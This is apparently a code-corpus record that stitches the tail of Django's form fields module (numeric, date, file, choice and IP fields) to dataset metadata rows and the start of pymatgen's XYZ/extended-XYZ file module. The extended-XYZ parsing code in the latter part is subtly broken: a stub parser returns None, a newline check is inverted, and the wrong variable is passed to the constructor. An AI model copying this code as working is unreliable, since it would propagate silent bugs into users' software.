of float(). Returns None for empty values.
"""
value = super(IntegerField, self).to_python(value)
if value in self.empty_values:
return None
if self.localize:
value = formats.sanitize_separators(value)
try:
value = float(value)
except (ValueError, TypeError):
raise ValidationError(self.error_messages['invalid'], code='invalid')
return value
def validate(self, value):
super(FloatField, self).validate(value)
# Check for NaN (which is the only thing not equal to itself) and +/- infinity
if value != value or value in (Decimal('Inf'), Decimal('-Inf')):
raise ValidationError(self.error_messages['invalid'], code='invalid')
return value
def widget_attrs(self, widget):
attrs = super(FloatField, self).widget_attrs(widget)
if isinstance(widget, NumberInput) and 'step' not in widget.attrs:
attrs.setdefault('step', 'any')
return attrs
class DecimalField(IntegerField):
default_error_messages = {
'invalid': _('Enter a number.'),
'max_digits': ungettext_lazy(
'Ensure that there are no more than %(max)s digit in total.',
'Ensure that there are no more than %(max)s digits in total.',
'max'),
'max_decimal_places': ungettext_lazy(
'Ensure that there are no more than %(max)s decimal place.',
'Ensure that there are no more than %(max)s decimal places.',
'max'),
'max_whole_digits': ungettext_lazy(
'Ensure that there are no more than %(max)s digit before the decimal point.',
'Ensure that there are no more than %(max)s digits before the decimal point.',
'max'),
}
def __init__(self, max_value=None, min_value=None, max_digits=None, decimal_places=None, *args, **kwargs):
self.max_digits, self.decimal_places = max_digits, decimal_places
super(DecimalField, self).__init__(max_value, min_value, *args, **kwargs)
def to_python(self, value):
"""
Validates that the input is a decimal number. Returns a Decimal
instance. Returns None for empty values. Ensures that there are no more
than max_digits in the number, and no more than decimal_places digits
after the decimal point.
"""
if value in self.empty_values:
return None
if self.localize:
value = formats.sanitize_separators(value)
value = smart_text(value).strip()
try:
value = Decimal(value)
except DecimalException:
raise ValidationError(self.error_messages['invalid'], code='invalid')
return value
def validate(self, value):
super(DecimalField, self).validate(value)
if value in self.empty_values:
return
# Check for NaN, Inf and -Inf values. We can't compare directly for NaN,
# since it is never equal to itself. However, NaN is the only value that
# isn't equal to itself, so we can use this to identify NaN
if value != value or value == Decimal("Inf") or value == Decimal("-Inf"):
raise ValidationError(self.error_messages['invalid'], code='invalid')
sign, digittuple, exponent = value.as_tuple()
decimals = abs(exponent)
# digittuple doesn't include any leading zeros.
digits = len(digittuple)
if decimals > digits:
# We have leading zeros up to or past the decimal point. Count
# everything past the decimal point as a digit. We do not count
# 0 before the decimal point as a digit since that would mean
# we would not allow max_digits = decimal_places.
digits = decimals
whole_digits = digits - decimals
if self.max_digits is not None and digits > self.max_digits:
raise ValidationError(
self.error_messages['max_digits'],
code='max_digits',
params={'max': self.max_digits},
)
if self.decimal_places is not None and decimals > self.decimal_places:
raise ValidationError(
self.error_messages['max_decimal_places'],
code='max_decimal_places',
params={'max': self.decimal_places},
)
if (self.max_digits is not None and self.decimal_places is not None
and whole_digits > (self.max_digits - self.decimal_places)):
raise ValidationError(
self.error_messages['max_whole_digits'],
code='max_whole_digits',
params={'max': (self.max_digits - self.decimal_places)},
)
return value
def widget_attrs(self, widget):
attrs = super(DecimalField, self).widget_attrs(widget)
if isinstance(widget, NumberInput) and 'step' not in widget.attrs:
if self.decimal_places is not None:
# Use exponential notation for small values since they might
# be parsed as 0 otherwise. ref #20765
step = str(Decimal('1') / 10 ** self.decimal_places).lower()
else:
step = 'any'
attrs.setdefault('step', step)
return attrs
class BaseTemporalField(Field):
def __init__(self, input_formats=None, *args, **kwargs):
super(BaseTemporalField, self).__init__(*args, **kwargs)
if input_formats is not None:
self.input_formats = input_formats
def to_python(self, value):
# Try to coerce the value to unicode.
unicode_value = force_text(value, strings_only=True)
if isinstance(unicode_value, six.text_type):
value = unicode_value.strip()
# If unicode, try to strptime against each input format.
if isinstance(value, six.text_type):
for format in self.input_formats:
try:
return self.strptime(value, format)
except (ValueError, TypeError):
continue
raise ValidationError(self.error_messages['invalid'], code='invalid')
def strptime(self, value, format):
raise NotImplementedError('Subclasses must define this method.')
class DateField(BaseTemporalField):
widget = DateInput
input_formats = formats.get_format_lazy('DATE_INPUT_FORMATS')
default_error_messages = {
'invalid': _('Enter a valid date.'),
}
def to_python(self, value):
"""
Validates that the input can be converted to a date. Returns a Python
datetime.date object.
"""
if value in self.empty_values:
return None
if isinstance(value, datetime.datetime):
return value.date()
if isinstance(value, datetime.date):
return value
return super(DateField, self).to_python(value)
def strptime(self, value, format):
return datetime.datetime.strptime(force_str(value), format).date()
class TimeField(BaseTemporalField):
widget = TimeInput
input_formats = formats.get_format_lazy('TIME_INPUT_FORMATS')
default_error_messages = {
'invalid': _('Enter a valid time.')
}
def to_python(self, value):
"""
Validates that the input can be converted to a time. Returns a Python
datetime.time object.
"""
if value in self.empty_values:
return None
if isinstance(value, datetime.time):
return value
return super(TimeField, self).to_python(value)
def strptime(self, value, format):
return datetime.datetime.strptime(force_str(value), format).time()
class DateTimeField(BaseTemporalField):
widget = DateTimeInput
input_formats = formats.get_format_lazy('DATETIME_INPUT_FORMATS')
default_error_messages = {
'invalid': _('Enter a valid date/time.'),
}
def prepare_value(self, value):
if isinstance(value, datetime.datetime):
value = to_current_timezone(value)
return value
def to_python(self, value):
"""
Validates that the input can be converted to a datetime. Returns a
Python datetime.datetime object.
"""
if value in self.empty_values:
return None
if isinstance(value, datetime.datetime):
return from_current_timezone(value)
if isinstance(value, datetime.date):
result = datetime.datetime(value.year, value.month, value.day)
return from_current_timezone(result)
if isinstance(value, list):
# Input comes from a SplitDateTimeWidget, for example. So, it's two
# components: date and time.
warnings.warn(
'Using SplitDateTimeWidget with DateTimeField is deprecated. '
'Use SplitDateTimeField instead.',
RemovedInDjango19Warning, stacklevel=2)
if len(value) != 2:
raise ValidationError(self.error_messages['invalid'], code='invalid')
if value[0] in self.empty_values and value[1] in self.empty_values:
return None
value = '%s %s' % tuple(value)
result = super(DateTimeField, self).to_python(value)
return from_current_timezone(result)
def strptime(self, value, format):
return datetime.datetime.strptime(force_str(value), format)
class RegexField(CharField):
def __init__(self, regex, max_length=None, min_length=None, error_message=None, *args, **kwargs):
"""
regex can be either a string or a compiled regular expression object.
error_message is an optional error message to use, if
'Enter a valid value' is too generic for you.
"""
# error_message is just kept for backwards compatibility:
if error_message:
error_messages = kwargs.get('error_messages') or {}
error_messages['invalid'] = error_message
kwargs['error_messages'] = error_messages
super(RegexField, self).__init__(max_length, min_length, *args, **kwargs)
self._set_regex(regex)
def _get_regex(self):
return self._regex
def _set_regex(self, regex):
if isinstance(regex, six.string_types):
regex = re.compile(regex, re.UNICODE)
self._regex = regex
if hasattr(self, '_regex_validator') and self._regex_validator in self.validators:
self.validators.remove(self._regex_validator)
self._regex_validator = validators.RegexValidator(regex=regex)
self.validators.append(self._regex_validator)
regex = property(_get_regex, _set_regex)
class EmailField(CharField):
widget = EmailInput
default_validators = [validators.validate_email]
def clean(self, value):
value = self.to_python(value).strip()
return super(EmailField, self).clean(value)
class FileField(Field):
widget = ClearableFileInput
default_error_messages = {
'invalid': _("No file was submitted. Check the encoding type on the form."),
'missing': _("No file was submitted."),
'empty': _("The submitted file is empty."),
'max_length': ungettext_lazy(
'Ensure this filename has at most %(max)d character (it has %(length)d).',
'Ensure this filename has at most %(max)d characters (it has %(length)d).',
'max'),
'contradiction': _('Please either submit a file or check the clear checkbox, not both.')
}
def __init__(self, *args, **kwargs):
self.max_length = kwargs.pop('max_length', None)
self.allow_empty_file = kwargs.pop('allow_empty_file', False)
super(FileField, self).__init__(*args, **kwargs)
def to_python(self, data):
if data in self.empty_values:
return None
# UploadedFile objects should have name and size attributes.
try:
file_name = data.name
file_size = data.size
except AttributeError:
raise ValidationError(self.error_messages['invalid'], code='invalid')
if self.max_length is not None and len(file_name) > self.max_length:
params = {'max': self.max_length, 'length': len(file_name)}
raise ValidationError(self.error_messages['max_length'], code='max_length', params=params)
if not file_name:
raise ValidationError(self.error_messages['invalid'], code='invalid')
if not self.allow_empty_file and not file_size:
raise ValidationError(self.error_messages['empty'], code='empty')
return data
def clean(self, data, initial=None):
# If the widget got contradictory inputs, we raise a validation error
if data is FILE_INPUT_CONTRADICTION:
raise ValidationError(self.error_messages['contradiction'], code='contradiction')
# False means the field value should be cleared; further validation is
# not needed.
if data is False:
if not self.required:
return False
# If the field is required, clearing is not possible (the widget
# shouldn't return False data in that case anyway). False is not
# in self.empty_value; if a False value makes it this far
# it should be validated from here on out as None (so it will be
# caught by the required check).
data = None
if not data and initial:
return initial
return super(FileField, self).clean(data)
def bound_data(self, data, initial):
if data in (None, FILE_INPUT_CONTRADICTION):
return initial
return data
def _has_changed(self, initial, data):
if data is None:
return False
return True
class ImageField(FileField):
default_error_messages = {
'invalid_image': _("Upload a valid image. The file you uploaded was either not an image or a corrupted image."),
}
def to_python(self, data):
"""
Checks that the file-upload field data contains a valid image (GIF, JPG,
PNG, possibly others -- whatever the Python Imaging Library supports).
"""
f = super(ImageField, self).to_python(data)
if f is None:
return None
from PIL import Image
# We need to get a file object for Pillow. We might have a path or we might
# have to read the data into memory.
if hasattr(data, 'temporary_file_path'):
file = data.temporary_file_path()
else:
if hasattr(data, 'read'):
file = BytesIO(data.read())
else:
file = BytesIO(data['content'])
try:
# load() could spot a truncated JPEG, but it loads the entire
# image in memory, which is a DoS vector. See #3848 and #18520.
# verify() must be called immediately after the constructor.
Image.open(file).verify()
except Exception:
# Pillow doesn't recognize it as an image.
six.reraise(ValidationError, ValidationError(
self.error_messages['invalid_image'],
code='invalid_image',
), sys.exc_info()[2])
if hasattr(f, 'seek') and callable(f.seek):
f.seek(0)
return f
class URLField(CharField):
widget = URLInput
default_error_messages = {
'invalid': _('Enter a valid URL.'),
}
default_validators = [validators.URLValidator()]
def to_python(self, value):
def split_url(url):
"""
Returns a list of url parts via ``urlparse.urlsplit`` (or raises a
``ValidationError`` exception for certain).
"""
try:
return list(urlsplit(url))
except ValueError:
# urlparse.urlsplit can raise a ValueError with some
# misformatted URLs.
raise ValidationError(self.error_messages['invalid'], code='invalid')
value = super(URLField, self).to_python(value)
if value:
url_fields = split_url(value)
if not url_fields[0]:
# If no URL scheme given, assume http://
url_fields[0] = 'http'
if not url_fields[1]:
# Assume that if no domain is provided, that the path segment
# contains the domain.
url_fields[1] = url_fields[2]
url_fields[2] = ''
# Rebuild the url_fields list, since the domain segment may now
# contain the path too.
url_fields = split_url(urlunsplit(url_fields))
value = urlunsplit(url_fields)
return value
def clean(self, value):
value = self.to_python(value).strip()
return super(URLField, self).clean(value)
class BooleanField(Field):
widget = CheckboxInput
def to_python(self, value):
"""Returns a Python boolean object."""
# Explicitly check for the string 'False', which is what a hidden field
# will submit for False. Also check for '0', since this is what
# RadioSelect will provide. Because bool("True") == bool('1') == True,
# we don't need to handle that explicitly.
if isinstance(value, six.string_types) and value.lower() in ('false', '0'):
value = False
else:
value = bool(value)
return super(BooleanField, self).to_python(value)
def validate(self, value):
if not value and self.required:
raise ValidationError(self.error_messages['required'], code='required')
def _has_changed(self, initial, data):
# Sometimes data or initial could be None or '' which should be the
# same thing as False.
if initial == 'False':
# show_hidden_initial may have transformed False to 'False'
initial = False
return bool(initial) != bool(data)
class NullBooleanField(BooleanField):
"""
A field whose valid values are None, True and False. Invalid values are
cleaned to None.
"""
widget = NullBooleanSelect
def to_python(self, value):
"""
Explicitly checks for the string 'True' and 'False', which is what a
hidden field will submit for True and False, and for '1' and '0', which
is what a RadioField will submit. Unlike the Booleanfield we need to
explicitly check for True, because we are not using the bool() function
"""
if value in (True, 'True', '1'):
return True
elif value in (False, 'False', '0'):
return False
else:
return None
def validate(self, value):
pass
def _has_changed(self, initial, data):
# None (unknown) and False (No) are not the same
if initial is not None:
initial = bool(initial)
if data is not None:
data = bool(data)
return initial != data
class ChoiceField(Field):
widget = Select
default_error_messages = {
'invalid_choice': _('Select a valid choice. %(value)s is not one of the available choices.'),
}
def __init__(self, choices=(), required=True, widget=None, label=None,
initial=None, help_text='', *args, **kwargs):
super(ChoiceField, self).__init__(required=required, widget=widget, label=label,
initial=initial, help_text=help_text, *args, **kwargs)
self.choices = choices
def __deepcopy__(self, memo):
result = super(ChoiceField, self).__deepcopy__(memo)
result._choices = copy.deepcopy(self._choices, memo)
return result
def _get_choices(self):
return self._choices
def _set_choices(self, value):
# Setting choices also sets the choices on the widget.
# choices can be any iterable, but we call list() on it because
# it will be consumed more than once.
self._choices = self.widget.choices = list(value)
choices = property(_get_choices, _set_choices)
def to_python(self, value):
"Returns a Unicode object."
if value in self.empty_values:
return ''
return smart_text(value)
def validate(self, value):
"""
Validates that the input is in self.choices.
"""
super(ChoiceField, self).validate(value)
if value and not self.valid_value(value):
raise ValidationError(
self.error_messages['invalid_choice'],
code='invalid_choice',
params={'value': value},
)
def valid_value(self, value):
"Check to see if the provided value is a valid choice"
text_value = force_text(value)
for k, v in self.choices:
if isinstance(v, (list, tuple)):
# This is an optgroup, so look inside the group for options
for k2, v2 in v:
if value == k2 or text_value == force_text(k2):
return True
else:
if value == k or text_value == force_text(k):
return True
return False
class TypedChoiceField(ChoiceField):
def __init__(self, *args, **kwargs):
self.coerce = kwargs.pop('coerce', lambda val: val)
self.empty_value = kwargs.pop('empty_value', '')
super(TypedChoiceField, self).__init__(*args, **kwargs)
def _coerce(self, value):
"""
Validate that the value can be coerced to the right type (if not empty).
"""
if value == self.empty_value or value in self.empty_values:
return self.empty_value
try:
value = self.coerce(value)
except (ValueError, TypeError, ValidationError):
raise ValidationError(
self.error_messages['invalid_choice'],
code='invalid_choice',
params={'value': value},
)
return value
def clean(self, value):
value = super(TypedChoiceField, self).clean(value)
return self._coerce(value)
class MultipleChoiceField(ChoiceField):
hidden_widget = MultipleHiddenInput
widget = SelectMultiple
default_error_messages = {
'invalid_choice': _('Select a valid choice. %(value)s is not one of the available choices.'),
'invalid_list': _('Enter a list of values.'),
}
def to_python(self, value):
if not value:
return []
elif not isinstance(value, (list, tuple)):
raise ValidationError(self.error_messages['invalid_list'], code='invalid_list')
return [smart_text(val) for val in value]
def validate(self, value):
"""
Validates that the input is a list or tuple.
"""
if self.required and not value:
raise ValidationError(self.error_messages['required'], code='required')
# Validate that each value in the value list is in self.choices.
for val in value:
if not self.valid_value(val):
raise ValidationError(
self.error_messages['invalid_choice'],
code='invalid_choice',
params={'value': val},
)
def _has_changed(self, initial, data):
if initial is None:
initial = []
if data is None:
data = []
if len(initial) != len(data):
return True
initial_set = set(force_text(value) for value in initial)
data_set = set(force_text(value) for value in data)
return data_set != initial_set
class TypedMultipleChoiceField(MultipleChoiceField):
def __init__(self, *args, **kwargs):
self.coerce = kwargs.pop('coerce', lambda val: val)
self.empty_value = kwargs.pop('empty_value', [])
super(TypedMultipleChoiceField, self).__init__(*args, **kwargs)
def _coerce(self, value):
"""
Validates that the values are in self.choices and can be coerced to the
right type.
"""
if value == self.empty_value or value in self.empty_values:
return self.empty_value
new_value = []
for choice in value:
try:
new_value.append(self.coerce(choice))
except (ValueError, TypeError, ValidationError):
raise ValidationError(
self.error_messages['invalid_choice'],
code='invalid_choice',
params={'value': choice},
)
return new_value
def clean(self, value):
value = super(TypedMultipleChoiceField, self).clean(value)
return self._coerce(value)
def validate(self, value):
if value != self.empty_value:
super(TypedMultipleChoiceField, self).validate(value)
elif self.required:
raise ValidationError(self.error_messages['required'], code='required')
class ComboField(Field):
"""
A Field whose clean() method calls multiple Field clean() methods.
"""
def __init__(self, fields=(), *args, **kwargs):
super(ComboField, self).__init__(*args, **kwargs)
# Set 'required' to False on the individual fields, because the
# required validation will be handled by ComboField, not by those
# individual fields.
for f in fields:
f.required = False
self.fields = fields
def clean(self, value):
"""
Validates the given value against all of self.fields, which is a
list of Field instances.
"""
super(ComboField, self).clean(value)
for field in self.fields:
value = field.clean(value)
return value
class MultiValueField(Field):
"""
A Field that aggregates the logic of multiple Fields.
Its clean() method takes a "decompressed" list of values, which are then
cleaned into a single value according to self.fields. Each value in
this list is cleaned by the corresponding field -- the first value is
cleaned by the first field, the second value is cleaned by the second
field, etc. Once all fields are cleaned, the list of clean values is
"compressed" into a single value.
Subclasses should not have to implement clean(). Instead, they must
implement compress(), which takes a list of valid values and returns a
"compressed" version of those values -- a single value.
You'll probably want to use this with MultiWidget.
"""
default_error_messages = {
'invalid': _('Enter a list of values.'),
'incomplete': _('Enter a complete value.'),
}
def __init__(self, fields=(), *args, **kwargs):
self.require_all_fields = kwargs.pop('require_all_fields', True)
super(MultiValueField, self).__init__(*args, **kwargs)
for f in fields:
f.error_messages.setdefault('incomplete',
self.error_messages['incomplete'])
if self.require_all_fields:
# Set 'required' to False on the individual fields, because the
# required validation will be handled by MultiValueField, not
# by those individual fields.
f.required = False
self.fields = fields
def __deepcopy__(self, memo):
result = super(MultiValueField, self).__deepcopy__(memo)
result.fields = tuple([x.__deepcopy__(memo) for x in self.fields])
return result
def validate(self, value):
pass
def clean(self, value):
"""
Validates every value in the given list. A value is validated against
the corresponding Field in self.fields.
For example, if this MultiValueField was instantiated with
fields=(DateField(), TimeField()), clean() would call
DateField.clean(value[0]) and TimeField.clean(value[1]).
"""
clean_data = []
errors = []
if not value or isinstance(value, (list, tuple)):
if not value or not [v for v in value if v not in self.empty_values]:
if self.required:
raise ValidationError(self.error_messages['required'], code='required')
else:
return self.compress([])
else:
raise ValidationError(self.error_messages['invalid'], code='invalid')
for i, field in enumerate(self.fields):
try:
field_value = value[i]
except IndexError:
field_value = None
if field_value in self.empty_values:
if self.require_all_fields:
# Raise a 'required' error if the MultiValueField is
# required and any field is empty.
if self.required:
raise ValidationError(self.error_messages['required'], code='required')
elif field.required:
# Otherwise, add an 'incomplete' error to the list of
# collected errors and skip field cleaning, if a required
# field is empty.
if field.error_messages['incomplete'] not in errors:
errors.append(field.error_messages['incomplete'])
continue
try:
clean_data.append(field.clean(field_value))
except ValidationError as e:
# Collect all validation errors in a single list, which we'll
# raise at the end of clean(), rather than raising a single
# exception for the first error we encounter. Skip duplicates.
errors.extend(m for m in e.error_list if m not in errors)
if errors:
raise ValidationError(errors)
out = self.compress(clean_data)
self.validate(out)
self.run_validators(out)
return out
def compress(self, data_list):
"""
Returns a single value for the given list of values. The values can be
assumed to be valid.
For example, if this MultiValueField was instantiated with
fields=(DateField(), TimeField()), this might return a datetime
object created by combining the date and time in data_list.
"""
raise NotImplementedError('Subclasses must implement this method.')
def _has_changed(self, initial, data):
if initial is None:
initial = ['' for x in range(0, len(data))]
else:
if not isinstance(initial, list):
initial = self.widget.decompress(initial)
for field, initial, data in zip(self.fields, initial, data):
if field._has_changed(field.to_python(initial), data):
return True
return False
class FilePathField(ChoiceField):
def __init__(self, path, match=None, recursive=False, allow_files=True,
allow_folders=False, required=True, widget=None, label=None,
initial=None, help_text='', *args, **kwargs):
self.path, self.match, self.recursive = path, match, recursive
self.allow_files, self.allow_folders = allow_files, allow_folders
super(FilePathField, self).__init__(choices=(), required=required,
widget=widget, label=label, initial=initial, help_text=help_text,
*args, **kwargs)
if self.required:
self.choices = []
else:
self.choices = [("", "---------")]
if self.match is not None:
self.match_re = re.compile(self.match)
if recursive:
for root, dirs, files in sorted(os.walk(self.path)):
if self.allow_files:
for f in files:
if self.match is None or self.match_re.search(f):
f = os.path.join(root, f)
self.choices.append((f, f.replace(path, "", 1)))
if self.allow_folders:
for f in dirs:
if f == '__pycache__':
continue
if self.match is None or self.match_re.search(f):
f = os.path.join(root, f)
self.choices.append((f, f.replace(path, "", 1)))
else:
try:
for f in sorted(os.listdir(self.path)):
if f == '__pycache__':
continue
full_file = os.path.join(self.path, f)
if (((self.allow_files and os.path.isfile(full_file)) or
(self.allow_folders and os.path.isdir(full_file))) and
(self.match is None or self.match_re.search(f))):
self.choices.append((full_file, f))
except OSError:
pass
self.widget.choices = self.choices
class SplitDateTimeField(MultiValueField):
widget = SplitDateTimeWidget
hidden_widget = SplitHiddenDateTimeWidget
default_error_messages = {
'invalid_date': _('Enter a valid date.'),
'invalid_time': _('Enter a valid time.'),
}
def __init__(self, input_date_formats=None, input_time_formats=None, *args, **kwargs):
errors = self.default_error_messages.copy()
if 'error_messages' in kwargs:
errors.update(kwargs['error_messages'])
localize = kwargs.get('localize', False)
fields = (
DateField(input_formats=input_date_formats,
error_messages={'invalid': errors['invalid_date']},
localize=localize),
TimeField(input_formats=input_time_formats,
error_messages={'invalid': errors['invalid_time']},
localize=localize),
)
super(SplitDateTimeField, self).__init__(fields, *args, **kwargs)
def compress(self, data_list):
if data_list:
# Raise a validation error if time or date is empty
# (possible if SplitDateTimeField has required=False).
if data_list[0] in self.empty_values:
raise ValidationError(self.error_messages['invalid_date'], code='invalid_date')
if data_list[1] in self.empty_values:
raise ValidationError(self.error_messages['invalid_time'], code='invalid_time')
result = datetime.datetime.combine(*data_list)
return from_current_timezone(result)
return None
class IPAddressField(CharField):
default_validators = [validators.validate_ipv4_address]
def __init__(self, *args, **kwargs):
warnings.warn("IPAddressField has been deprecated. Use GenericIPAddressField instead.",
RemovedInDjango19Warning)
super(IPAddressField, self).__init__(*args, **kwargs)
def to_python(self, value):
if value in self.empty_values:
return ''
return value.strip()
class GenericIPAddressField(CharField):
def __init__(self, protocol='both', unpack_ipv4=False, *args, **kwargs):
self.unpack_ipv4 = unpack_ipv4
self.default_validators = validators.ip_address_validators(protocol, unpack_ipv4)[0]
super(GenericIPAddressField, self).__init__(*args, **kwargs)
def to_python(self, value):
if value in self.empty_values:
return ''
value = value.strip()
if value and ':' in value:
return clean_ipv6_address(value, self.unpack_ipv4)
return value
class SlugField(CharField):
default_validators = [validators.validate_slug]
def clean(self, value):
value = self.to_python(value).strip()
return super(SlugField, self).clean(value)
| 38.916043
| 120
| 0.613359
|
acff7aae52865ebfdf28487a0998116b897dc77e
| 15,031
|
py
|
Python
|
pymatgen/io/xyz.py
|
stichri/pymatgen
|
b02a0099e3706b674a6729458e9101ee8ec78f44
|
[
"MIT"
] | null | null | null |
pymatgen/io/xyz.py
|
stichri/pymatgen
|
b02a0099e3706b674a6729458e9101ee8ec78f44
|
[
"MIT"
] | null | null | null |
pymatgen/io/xyz.py
|
stichri/pymatgen
|
b02a0099e3706b674a6729458e9101ee8ec78f44
|
[
"MIT"
] | null | null | null |
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
Module implementing an (extended) XYZ file object class.
"""
import re
from io import StringIO
import pandas as pd
import numpy as np
from monty.io import zopen
from pymatgen.core import IMolecule, IStructure, Molecule, Lattice
from collections import OrderedDict, namedtuple
from operator import add
from typing import Dict, List, Tuple, Union, Any
class XYZ:
"""
Basic class for importing and exporting Molecules or Structures in XYZ
format.
.. note::
Exporting periodic structures in the XYZ format will lose information
about the periodicity. Essentially, only Cartesian coordinates are
written in this format and no information is retained about the
lattice.
"""
def __init__(self, mol: Molecule, coord_precision: int = 6):
"""
Args:
mol: Input molecule or list of molecules
coord_precision: Precision to be used for coordinates.
"""
if isinstance(mol, Molecule) or not isinstance(mol, list):
self._mols = [mol]
else:
self._mols = mol
self.precision = coord_precision
@property
def molecule(self) -> Molecule:
"""
Returns molecule associated with this XYZ. In case multiple frame
XYZ, returns the last frame.
"""
return self._mols[-1]
@property
def all_molecules(self):
"""
Returns all the frames of molecule associated with this XYZ.
"""
return self._mols
@staticmethod
def _from_frame_string(contents):
"""
Convert a single frame XYZ string to a molecule
"""
lines = contents.split("\n")
num_sites = int(lines[0])
coords = []
sp = []
coord_patt = re.compile(r"(\w+)\s+([0-9\-\+\.*^eEdD]+)\s+([0-9\-\+\.*^eEdD]+)\s+" r"([0-9\-\+\.*^eEdD]+)")
for i in range(2, 2 + num_sites):
m = coord_patt.search(lines[i])
if m:
sp.append(m.group(1)) # this is 1-indexed
# this is 0-indexed
# in case of 0.0D+00 or 0.00d+01 old double precision writing
# replace d or D by e for ten power exponent,
# and some files use *^ convention in place of e
xyz = [val.lower().replace("d", "e").replace("*^", "e") for val in m.groups()[1:4]]
coords.append([float(val) for val in xyz])
return Molecule(sp, coords)
@staticmethod
def from_string(contents):
"""
Creates XYZ object from a string.
Args:
contents: String representing an XYZ file.
Returns:
XYZ object
"""
if contents[-1] != "\n":
contents += "\n"
white_space = r"[ \t\r\f\v]"
natoms_line = white_space + r"*\d+" + white_space + r"*\n"
comment_line = r"[^\n]*\n"
coord_lines = r"(\s*\w+\s+[0-9\-\+\.*^eEdD]+\s+[0-9\-\+\.*^eEdD]+" r"\s+[0-9\-\+\.*^eEdD]+.*\n)+"
frame_pattern_text = natoms_line + comment_line + coord_lines
pat = re.compile(frame_pattern_text, re.MULTILINE)
mols = []
for xyz_match in pat.finditer(contents):
xyz_text = xyz_match.group(0)
mols.append(XYZ._from_frame_string(xyz_text))
return XYZ(mols)
@staticmethod
def from_file(filename):
"""
Creates XYZ object from a file.
Args:
filename: XYZ filename
Returns:
XYZ object
"""
with zopen(filename, "rt") as f:
return XYZ.from_string(f.read())
def as_dataframe(self):
"""
Generates a coordinates data frame with columns: atom, x, y, and z
In case of multiple frame XYZ, returns the last frame.
Returns:
pandas.DataFrame
"""
lines = str(self)
sio = StringIO(lines)
df = pd.read_csv(
sio,
header=None,
skiprows=[0, 1],
comment="#",
delim_whitespace=True,
names=["atom", "x", "y", "z"],
)
df.index += 1
return df
def _frame_str(self, frame_mol):
output = [str(len(frame_mol)), frame_mol.composition.formula]
fmtstr = f"{{}} {{:.{self.precision}f}} {{:.{self.precision}f}} {{:.{self.precision}f}}"
for site in frame_mol:
output.append(fmtstr.format(site.specie, site.x, site.y, site.z))
return "\n".join(output)
def __str__(self):
return "\n".join([self._frame_str(mol) for mol in self._mols])
def write_file(self, filename):
"""
Writes XYZ to file.
Args:
filename: File name of output file.
"""
with zopen(filename, "wt") as f:
f.write(self.__str__())
class EXYZ(XYZ):
"""
Basic class for importing and exporting structure or molecules in the extended XYZ
format as described at https://libatoms.github.io/QUIP/io.html#extendedxyz.
Args:
structure: Input (list of) structure(s) or molecule(s)
.. note::
While exporting periodic structures in the XYZ format will lose information
about periodicity, the extended XYZ format does retain such information.
Moreover, arbitrary metadata is retained and encoded in terms of bools
(T or F), integer numbers, floats or strings (delimited by quotation marks
when including whitespaces) on a per-site and per-structure/molecule basis.
"""
_code2type = {
"L" : bool, "l" : bool,
"I" : int, "i" : int,
"R" : float, "r" : float,
"S" : str, "s" : str
}
_type2code = {
bool : "L",
int : "I", np.int : "I", np.int64 : "I", np.int32 : "I", np.int16 : "I", np.int8 : "I",
float : "R", np.float : "R", np.float128 : "R", np.float64 : "R", np.float16 : "R",
str : "S", list : "S", tuple : "S", np.ndarray : "S"
}
_quotes = r"\"'`´"
_whites_etc = r"\t\n\r\f\v"
_site_prop_key_sanitize_match = "[" + _whites_etc + _quotes + ":" + "]+"
_site_prop_val_sanitize_match = "[" + _whites_etc + _quotes + "]+"
_frame_prop_key_sanitize_match = "[" + " " + _whites_etc + _quotes + "=" + "]+"
_frame_prop_val_sanitize_match = "[" + _whites_etc + _quotes + "=" + "]+"
EXYZData = namedtuple("EXYZData", ["code", "data", "width"])
def __init__(
self,
mol: Union[IStructure, List[IStructure], IMolecule, List[IMolecule]],
mol_props: Union[Dict, List[Dict], Tuple[Dict]] = None,
float_precision : int = 6
) -> None:
super().__init__(
mol,
coord_precision=float_precision
)
self._fmt_float = "{{:.{}f}}".format(self.precision)
if isinstance(mol_props, (List, Tuple)):
self._mols_props = mol_props
elif mol_props is not None:
self._mols_props = [mol_props]
else:
self._mols_props = [None for m in self._mols]
if not len(self._mols_props) == len(self._mols):
raise ValueError(
"not as many molecule property sets ({}) as molecules ({})".format(
len(self._mols_props),
len(self._mols)
)
)
@staticmethod
def _mol_and_props_from_lines(
line_comment: str,
lines_sites: List[str]
) -> Tuple[IStructure, Dict]:
pass
return None, None
@staticmethod
def from_string(
string: str
) -> "EXYZ": # python <=3.7 can't annotate types not defined before, python >=4.0 will ...
string = string + "\n" if string[-1] == "\n" else string
mols = []
mols_props = []
lines = iter(string.split("\n"))
for line in lines:
try:
num_sites = int(line.split()[0])
except ValueError as ve:
raise Exception(str(ve) + " for frame {}".format(len(mols)+1)) from ve
try:
mol, props = EXYZ._mol_and_props_from_lines(
line_comment=next(lines),
lines_sites=[next(lines) for n in range(num_sites)]
)
mols.append(mol)
mols_props.append(props)
except StopIteration:
raise RuntimeError("lines unexpectedly exhausted while parsing exyz-file")
return EXYZ(mols, props)
def _site_prop_key(
self,
k: str
) -> str:
key = re.sub(self._site_prop_key_sanitize_match, "", str(k))
return key
def _site_prop_val(
self,
v: str
) -> str:
val = re.sub(self._site_prop_val_sanitize_match, "", str(v))
if re.search("[ ]+", val):
val = '"' + val + '"'
return val
def _code(
self,
val: Any
) -> str:
try:
code = self._type2code[type(val)]
except KeyError:
raise ValueError(
"Unable to map {} ({}), use appropriate string representation".format(type(val), val)
)
return code
def _val2coldata(
self,
val: Union[List, Tuple, np.ndarray, Any],
probe_seq=True
) -> Tuple[str, List[str], List[int]]:
if probe_seq and isinstance(val, (list, tuple, np.ndarray)):
codes = [self._code(v) for v in val]
if not len(set(codes)) == 1:
raise TypeError("Inconcistent types in data field")
code = codes[0]
data_str = [self._site_prop_val(*self._val2coldata(v, probe_seq=False)[1]) for v in val]
width = [len(d) for d in data_str]
else:
code = self._code(val)
if code == "R":
data_str = self._fmt_float.format(val)
elif code == "L":
data_str = "T" if val else "F"
else:
data_str = str(val)
data_str = [self._site_prop_val(data_str)]
width = [len(data_str[0])]
return code, data_str, width
def _site_data_columns(
self,
data_col: List
) -> EXYZData:
code0 = None
data_str0 = []
width0 = None
for d in data_col:
code, data_str, width = self._val2coldata(d)
if not code0:
code0 = code
if not width0:
width0 = width
if not code0 == code:
raise TypeError("Inconsistent types in data column")
if not len(width0) == len(width):
raise ValueError("Inconsistent lengths in data column")
data_str0.append(data_str)
width = tuple(max(w, w0) for w, w0 in zip(width, width0))
width0 = width
return EXYZ.EXYZData(code=code, data=data_str0, width=width)
